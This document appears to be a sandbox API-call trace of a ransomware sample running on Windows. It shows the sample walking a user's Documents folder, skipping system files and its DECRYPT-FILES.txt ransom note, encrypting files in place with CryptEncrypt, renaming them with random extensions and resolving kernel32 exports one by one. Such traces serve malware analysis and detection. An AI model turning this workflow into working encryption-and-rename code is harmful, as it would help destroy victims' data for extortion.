HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\VJDs-wsG_jZz.docx.o39UsPc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\vjds-wsg_jzz.docx.o39uspc"), dwFlags=0x0) returned 1 [0084.074] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.074] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.074] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.074] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22ba0ec0, ftCreationTime.dwHighDateTime=0x1d4cf27, ftLastAccessTime.dwLowDateTime=0x7bf3e5c0, ftLastAccessTime.dwHighDateTime=0x1d4ceae, ftLastWriteTime.dwLowDateTime=0x7bf3e5c0, ftLastWriteTime.dwHighDateTime=0x1d4ceae, nFileSizeHigh=0x0, nFileSizeLow=0xc63, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmJzl1cTVU87z.xlsx", cAlternateFileName="WMJZL1~1.XLS")) returned 1 [0084.074] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx", lpString2="DECRYPT-FILES.txt") returned 1 [0084.074] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx", lpString2="autorun.inf") returned 1 [0084.074] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx", lpString2="boot.ini") returned 1 [0084.074] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx", lpString2="desktop.ini") returned 1 [0084.074] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx", lpString2="ntuser.dat") returned 1 [0084.075] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx", lpString2="iconcache.db") returned 1 [0084.075] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx", lpString2="bootsect.bak") returned 1 [0084.075] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx", lpString2="ntuser.dat.log") returned 1 [0084.075] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx", lpString2="thumbs.db") returned 1 [0084.075] lstrcmpiW (lpString1="wmJzl1cTVU87z.xlsx", lpString2="Bootfont.bin") returned 1 [0084.075] lstrlenW (lpString="wmJzl1cTVU87z.xlsx") returned 18 [0084.075] lstrcmpiW (lpString1="xlsx", lpString2="lnk") returned 1 [0084.075] lstrcmpiW (lpString1="xlsx", lpString2="exe") returned 1 [0084.075] lstrcmpiW (lpString1="xlsx", lpString2="sys") returned 1 [0084.075] lstrcmpiW (lpString1="xlsx", lpString2="dll") returned 1 [0084.075] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0084.075] lstrlenW (lpString="wmJzl1cTVU87z.xlsx") returned 18 [0084.075] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0084.075] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="wmJzl1cTVU87z.xlsx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\wmJzl1cTVU87z.xlsx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\wmJzl1cTVU87z.xlsx" [0084.075] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.075] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\wmJzl1cTVU87z.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\wmjzl1ctvu87z.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0084.075] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=3171) returned 1 [0084.075] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0084.075] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.075] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.076] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.076] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.076] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0084.076] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.076] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.077] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.077] CloseHandle (hObject=0x42c) returned 1 [0084.077] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.077] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0084.078] CloseHandle (hObject=0x0) returned 0 [0084.078] CloseHandle (hObject=0x428) returned 1 [0084.078] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.078] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.078] GetTickCount () returned 0x114d7ba [0084.078] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.078] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.079] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.079] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.079] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.079] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\wmJzl1cTVU87z.xlsx") returned 76 [0084.079] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\wmJzl1cTVU87z.xlsx.x2HVYj7") returned 84 [0084.079] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\wmJzl1cTVU87z.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\wmjzl1ctvu87z.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\wmJzl1cTVU87z.xlsx.x2HVYj7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\wmjzl1ctvu87z.xlsx.x2hvyj7"), dwFlags=0x0) returned 1 [0084.080] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.080] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.081] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.081] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22ba0ec0, ftCreationTime.dwHighDateTime=0x1d4cf27, ftLastAccessTime.dwLowDateTime=0x7bf3e5c0, ftLastAccessTime.dwHighDateTime=0x1d4ceae, ftLastWriteTime.dwLowDateTime=0x7bf3e5c0, ftLastWriteTime.dwHighDateTime=0x1d4ceae, nFileSizeHigh=0x0, nFileSizeLow=0xc63, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmJzl1cTVU87z.xlsx", cAlternateFileName="WMJZL1~1.XLS")) returned 0 [0084.081] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0084.081] CloseHandle (hObject=0x410) returned 1 [0084.081] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae10b880, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae10b880, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae1319e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0084.081] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0084.081] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0084.081] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0084.081] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0084.081] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0084.081] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0084.081] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaa516c0, ftCreationTime.dwHighDateTime=0x1d55461, ftLastAccessTime.dwLowDateTime=0xe0b273e0, ftLastAccessTime.dwHighDateTime=0x1d53da4, ftLastWriteTime.dwLowDateTime=0xe0b273e0, ftLastWriteTime.dwHighDateTime=0x1d53da4, nFileSizeHigh=0x0, nFileSizeLow=0x18afc, dwReserved0=0x0, dwReserved1=0x0, cFileName="HJy9XqkxO.docx", cAlternateFileName="HJY9XQ~1.DOC")) returned 1 [0084.081] lstrcmpiW (lpString1="HJy9XqkxO.docx", lpString2="DECRYPT-FILES.txt") returned 1 [0084.081] lstrcmpiW (lpString1="HJy9XqkxO.docx", lpString2="autorun.inf") returned 1 [0084.081] lstrcmpiW (lpString1="HJy9XqkxO.docx", lpString2="boot.ini") returned 1 [0084.082] lstrcmpiW (lpString1="HJy9XqkxO.docx", lpString2="desktop.ini") returned 1 [0084.082] lstrcmpiW (lpString1="HJy9XqkxO.docx", lpString2="ntuser.dat") returned -1 [0084.082] lstrcmpiW (lpString1="HJy9XqkxO.docx", lpString2="iconcache.db") returned -1 [0084.082] lstrcmpiW (lpString1="HJy9XqkxO.docx", lpString2="bootsect.bak") returned 1 [0084.082] lstrcmpiW (lpString1="HJy9XqkxO.docx", lpString2="ntuser.dat.log") returned -1 [0084.082] lstrcmpiW (lpString1="HJy9XqkxO.docx", lpString2="thumbs.db") returned -1 [0084.082] lstrcmpiW (lpString1="HJy9XqkxO.docx", lpString2="Bootfont.bin") returned 1 [0084.082] lstrlenW (lpString="HJy9XqkxO.docx") returned 14 [0084.082] lstrcmpiW (lpString1="docx", lpString2="lnk") returned -1 [0084.082] lstrcmpiW (lpString1="docx", lpString2="exe") returned -1 [0084.082] lstrcmpiW (lpString1="docx", lpString2="sys") returned -1 [0084.082] lstrcmpiW (lpString1="docx", lpString2="dll") returned 1 [0084.082] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0084.082] lstrlenW (lpString="HJy9XqkxO.docx") returned 14 [0084.082] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0084.082] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="HJy9XqkxO.docx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HJy9XqkxO.docx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HJy9XqkxO.docx" [0084.082] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.082] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\HJy9XqkxO.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\hjy9xqkxo.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0084.082] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=101116) returned 1 [0084.082] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0084.082] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.083] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.083] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.083] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.083] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0084.083] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0084.085] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.085] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.086] CloseHandle (hObject=0x414) returned 1 [0084.086] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.086] WriteFile (in: hFile=0x410, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0084.087] CloseHandle (hObject=0x0) returned 0 [0084.087] CloseHandle (hObject=0x410) returned 1 [0084.087] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.087] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.087] GetTickCount () returned 0x114d7c9 [0084.087] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.088] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.088] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.088] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.088] lstrlenA (lpString="kernel32.dll") returned 12 [0084.088] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.088] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.088] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.088] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.089] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.089] lstrlenA (lpString="ADDATOMA") returned 8 [0084.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.089] lstrlenA (lpString="ADDATOMW") returned 8 [0084.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.089] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.089] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.089] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.089] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.089] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.089] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.089] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.089] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.089] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.089] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.089] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.089] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.089] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.089] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.089] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.089] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.089] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.090] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.090] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.090] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.090] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.090] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.090] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.090] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.090] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.090] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.090] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.090] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.090] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.090] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.090] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.090] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.090] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.090] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.090] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.090] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.091] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.091] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.091] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.091] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.091] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.091] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.091] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.091] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 